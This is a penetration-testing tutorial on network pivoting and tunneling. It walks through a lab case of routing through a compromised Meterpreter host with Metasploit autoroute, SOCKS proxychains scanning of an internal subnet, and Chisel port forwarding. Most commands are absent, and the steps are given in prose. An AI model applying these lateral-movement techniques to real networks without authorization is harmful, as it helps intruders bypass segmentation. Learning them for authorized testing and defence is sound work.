Pivoting & Tunneling
Pivoting is a technique used in penetration testing and cyber attacks where the attacker uses a compromised machine to move deeper into a network. By pivoting, an attacker can access different subnets that are not directly accessible from the attacker's original network. This allows the attacker to bypass network segmentation and access internal resources.
Introduction
Pivoting involves using a compromised host to relay traffic to other systems and subnets within the target network. This technique is essential for exploring network segments that are not directly accessible from the attacker's initial foothold. The compromised host acts as a bridge, forwarding traffic between the attacker and the internal targets.
Types of Pivoting
Network Pivoting (Layer 3):
Involves routing IP traffic through the compromised host to reach other network segments.
Utilizes routing and forwarding mechanisms.
Port Forwarding (Layer 4):
Involves forwarding specific ports from the attacker's machine to the target network through the compromised host.
Utilizes tools and techniques to forward traffic at the transport layer (TCP/UDP).
Application Layer Pivoting (Layer 7):
Involves tunneling application-specific traffic through the compromised host.
Utilizes proxies and application-level tunneling tools.
Tools Commonly Used for Pivoting
Metasploit Framework
Meterpreter
SSH (Secure Shell)
ProxyChains
SOCKS Proxy
Nmap
PowerShell Empire
Chisel
Plink (PuTTY Link)
Cobalt Strike
Impacket
FoxyProxy
MSFvenom
RDP (Remote Desktop Protocol)
Netcat
A real-world example of pivoting where an attacker, situated within the 192.168.x.x network segment, connects to and pivots into the internal network segment (lateral movement) using a second network interface card (NIC)
Pivoting to the Internal (different) subnet of the Victim Machine:
It is assumed that we already compromised the host File02 and got the meterpreter reverse shell with low privs (bdc\paul) in MSF- ParrosOS (Attacker Machine):
We could see the Internal 2nd NIC installed on the Victim System- File02 with the IP Address 172.16.69.4:
Since our goal is to reach out to the Internal Segment (172.16.69.X) of the Victim, we need to change the Routing, this can be achieved by using MSF:
Background Session 2:
Use the below MSF module to enable the Autoroute:
Route added successfully. To use external tools like Nmap, set up a system-wide proxy by using auxiliary/server/socks_proxy module. Change the default SRVPORT (i.e. 1080) to match the default port of proxychains i.e. 9050
Commands:
Use netstat command to verify that the proxy is running:
Scan the target machine using Nmap over proxychains. Remember, no configuration change is needed for proxychains to work because proxychains runs on port 9050 by default.
We got a success :)
We can see the open ports on File02 by scanning in to the different subnet (172.16.69.0/16):
Output of File01 (172.16.69.32):
Output of Backup_dc (BDC 172.16.69.70)- ADDC:
Please check/modify your proxychains config file before doing any activity:
nano /etc/proxychains4.conf
Extras:
We can also rdesktop to file01 (172.16.69.32);
Port Forwarding on Linux Machine without having ssh credentials
Port Forwarding using Chisel:
Chisel is a very useful tool comes handy while forwarding local port on the Linux Machine to the Attacker's machine.
The very good feature in this tool is that we DON'T require any credentials like ssh to do the same, just run Chisel as a Server on the Attacker Machine and then upload the same chisel executable on the Victim and run it as a Client in below way:
On Attacker Machine (e.g. Parrot/Kali):
On Target/Victim Machine:
3 & 4: To access the newly forwarded port 8000 on Attacker Machine:
Conclusion
Pivoting within a network is a critical technique used by attackers to move laterally and gain access to additional network segments. By exploiting compromised hosts and leveraging tools and techniques such as Metasploit, SSH tunneling, and proxy chains, attackers can bypass network segmentation and access otherwise isolated systems. Understanding these methods is essential for penetration testers to simulate real-world attack scenarios and for defenders to implement effective countermeasures.
Effective network defense strategies should include robust network segmentation, continuous monitoring, strong access controls, and regular security assessments. By doing so, organizations can reduce the risk of lateral movement and improve their overall security posture. Ensuring that security measures are in place to detect and respond to pivoting activities is crucial for maintaining the integrity and confidentiality of critical network resources.
Nowadays, Endpoint Detection and Response (EDR) solutions are capable of detecting and preventing these types of attacks. However, advanced hacking techniques can still circumvent these defenses.
These sophisticated methods are an integral part of what we teach in our live Red Teaming sessions, enabling security professionals to stay ahead of the latest threats and enhance their defensive capabilities.
Last updated